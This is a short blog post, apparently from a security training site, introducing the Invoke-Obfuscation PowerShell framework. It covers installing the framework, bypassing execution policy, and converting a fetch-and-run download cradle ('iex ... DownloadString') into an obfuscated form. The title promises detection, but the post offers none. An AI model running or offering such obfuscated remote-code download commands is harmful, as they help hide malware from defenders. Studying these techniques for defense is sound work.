Ready to Start Your Career?

PowerShell Obfuskation Techniques & How to Detect Them

Jinx 's profile image

By: Jinx

April 26, 2017

invoke-obfuscation-screenshotIntroduction:Invoke-Obfuscation is a code obfuscating Framework built on PowerShell by Daniel Bohannon.Attackers are using more and more powerful techniques to obfuscate their scripts and codes. PowerShell script is one such particular way of attack which is very dangerous if used due to few reasons
  • Most of the internet population is on Windows.
  • It can be executed in a different number of ways.
  • PowerShell can be used in every part of attack cycle
There are numerous ways to execute PowerShell scripts. They can be from files like (.ps1, .vbs, .bat), from Microsoft Word, Microsoft Excel or even Remotely!Installation: order to install the Invoke-Obfuscation tool, download the git repository to a folder and fire up your PowerShell then type in: Import-Module  ./Invoke-Obfuscation.psd1Invoke-Obfuscation If there was an error showing on your PC about Execution Policy Just type in this:  Set-ExecutionPolicy -Scope CurrentUser UnrestrictedThis lets you execute your downloaded scripts.Once this screen appears it is time to HAVE FUN!THIS: iex (New-Object Net.WebClient).DownloadString("https://%s:%s/%s")n This command to download something can be converted to this:((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}."`I`N`V`o`k`e`C`o`m`m`A`N`d"). "`N`e`w`S`c`R`i`p`T`B`l`o`c`k"((& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://'))) ….All you have to do is to is:SET variable <command>Once set, just type in encode and select the options from above. You can generate a token by pressing the token command etc. Keep exploring the possibilities! 
Schedule Demo